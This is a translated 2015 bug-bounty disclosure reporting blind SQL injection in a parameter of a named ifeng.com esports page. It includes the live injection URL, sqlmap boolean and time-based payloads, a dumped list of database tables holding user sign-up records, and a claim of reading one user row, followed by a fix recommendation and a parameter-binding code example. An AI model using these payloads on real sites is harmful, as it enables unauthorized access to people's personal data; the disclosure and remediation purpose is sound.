
SQL injection on an ifeng.com (Phoenix New Media) site, part 2 (large amount of user information leaked)

2015-03-21 11:55

Injection point

Code block:
http://esports.games.ifeng.com/sta/setuserin/?sid=dzshd1&user=

Testing showed that the sid parameter is injectable.



Code block:
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=dzshd1' AND 8747=8747 AND 'gksS'='gksS&user=

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: sid=dzshd1' AND SLEEP(5) AND 'Jpnj'='Jpnj&user=
---
[23:48:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11

Proof of vulnerability:

The database "esports_ifeng_93" can be reached.

[Screenshot: QQ截图20150203234935.png]

The database turned out to contain more than 100 tables, which appear to hold user records; by the look of it, a lot of them... o(∩_∩)o

Code block:
| contest_main |
| contest_type |
| game_list |
| game_type |
| hslist |
| ifeng_games_zhuanti |
| signup_userlist_1 |
| signup_userlist_10 |
| signup_userlist_11 |
| signup_userlist_12 |
| signup_userlist_13 |
| signup_userlist_14 |
| signup_userlist_15 |
| signup_userlist_16 |
| signup_userlist_17 |
| signup_userlist_18 |
| signup_userlist_19 |
| signup_userlist_2 |
| signup_userlist_20 |
| signup_userlist_21 |
| signup_userlist_22 |
| signup_userlist_23 |
| signup_userlist_24 |
| signup_userlist_25 |
| signup_userlist_26 |
| signup_userlist_27 |
| signup_userlist_28 |
| signup_userlist_29 |
| signup_userlist_3 |
| signup_userlist_30 |
| signup_userlist_31 |
| signup_userlist_32 |
| signup_userlist_33 |
| signup_userlist_34 |
| signup_userlist_35 |
| signup_userlist_36 |
| signup_userlist_37 |
| signup_userlist_38 |
| signup_userlist_39 |
| signup_userlist_4 |
| signup_userlist_40 |
| signup_userlist_41 |
| signup_userlist_42 |
| signup_userlist_43 |
| signup_userlist_44 |
| signup_userlist_45 |
| signup_userlist_46 |
| signup_userlist_47 |
| signup_userlist_48 |
| signup_userlist_49 |
| signup_userlist_5 |
| signup_userlist_50 |
| signup_userlist_51 |
| signup_userlist_52 |
| signup_userlist_53 |
| signup_userlist_54 |
| signup_userlist_55 |
| signup_userlist_56 |
| signup_userlist_57 |
| signup_userlist_58 |
| signup_userlist_59 |
| signup_userlist_6 |
| signup_userlist_60 |
| signup_userlist_61 |
| signup_userlist_62 |
| signup_userlist_63 |
| signup_userlist_64 |
| signup_userlist_65 |
| signup_userlist_66 |
| signup_userlist_67 |
| signup_userlist_68 |
| signup_userlist_69 |
| signup_userlist_7 |
| signup_userlist_70 |
| signup_userlist_71 |
| signup_userlist_72 |
| signup_userlist_73 |
| signup_userlist_74 |
| signup_userlist_75 |
| signup_userlist_76 |
| signup_userlist_77 |
| signup_userlist_78 |
| signup_userlist_79 |
| signup_userlist_8 |
| signup_userlist_9 |
| signup_userlist_tmplate |
| userinfo_list |
| userlist |
| warlist_1 |
| warlist_10 |
| warlist_11 |
| warlist_12 |
| warlist_13 |
| warlist_14 |
| warlist_15 |
| warlist_16 |
| warlist_17 |
| warlist_18 |
| warlist_19 |
| warlist_2 |
| warlist_20 |
| warlist_21 |
| warlist_22 |
| warlist_23 |
| warlist_24 |
| warlist_25 |
| warlist_26 |
| warlist_27 |
| warlist_28 |
| warlist_29 |
| warlist_3 |
| warlist_30 |
| warlist_31 |
| warlist_32 |
| warlist_33 |
| warlist_34 |
| warlist_35 |
| warlist_36 |
| warlist_37 |
| warlist_38 |
| warlist_39 |
| warlist_4 |
| warlist_40 |
| warlist_41 |
| warlist_42 |
| warlist_43 |
| warlist_44 |
| warlist_45 |
| warlist_46 |
| warlist_47 |
| warlist_48 |
| warlist_49 |
| warlist_5 |
| warlist_50 |
| warlist_51 |
| warlist_52 |
| warlist_53 |
| warlist_54 |
| warlist_55 |
| warlist_56 |
| warlist_57 |
| warlist_58 |
| warlist_59 |
| warlist_6 |
| warlist_60 |
| warlist_61 |
| warlist_62 |
| warlist_63 |
| warlist_65 |
| warlist_66 |
| warlist_67 |
| warlist_68 |
| warlist_69 |
| warlist_7 |
| warlist_70 |
| warlist_71 |
| warlist_72 |
| warlist_73 |
| warlist_74 |
| warlist_77 |
| warlist_78 |
| warlist_79 |
| warlist_8 |
| warlist_9 |
| warlist_tmplate |





Enumerated the signup_userlist_1 table from it, reading only a single row. The other tables and their data were not touched.

[Screenshot: QQ截图20150204004619.png]

Hoping for a prompt fix. Will this one get 20 Rank?..

Fix recommendation:

Filter the input. Treating the sid value as data rather than as part of the SQL statement (parameter binding) removes the injection, and an allow-list on the expected identifier format is a cheap second layer.
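To make the fix concrete, here is an added example (not code from the report or from the site) contrasting the bug class with its repaired form. It uses an in-memory SQLite stand-in; the table, column and identifier format are assumptions, and the test input is the boolean-based payload that sqlmap reported above.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the sign-up store. The table and
# column names are assumptions, not the site's real schema.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE signup_userlist_1 (sid TEXT, user TEXT)")
conn.execute("INSERT INTO signup_userlist_1 VALUES ('dzshd1', 'player_one')")

# Assumed allow-list for what a contest id is expected to look like.
SID_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def lookup_vulnerable(sid: str):
    """String concatenation: the value becomes part of the SQL statement.

    A sid carrying an always-true tail (the report's boolean payload) still
    returns the dzshd1 row, which is exactly the oracle sqlmap detected.
    """
    sql = f"SELECT user FROM signup_userlist_1 WHERE sid = '{sid}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(sid: str):
    """Allow-list the id, then bind it as a parameter.

    With binding the whole input is compared as one literal value, so an
    injected tail simply matches no row; the regex rejects it even earlier.
    """
    if not SID_RE.fullmatch(sid):
        return None
    row = conn.execute(
        "SELECT user FROM signup_userlist_1 WHERE sid = ?", (sid,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "dzshd1' AND 8747=8747 AND 'gksS'='gksS"  # from the sqlmap output
    print("vulnerable:", lookup_vulnerable(payload))  # player_one (condition evaluated)
    print("hardened:  ", lookup_hardened(payload))    # None (treated as an opaque value)
```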

Source: www.wooyun.org/bugs/wooyun-2015-095544
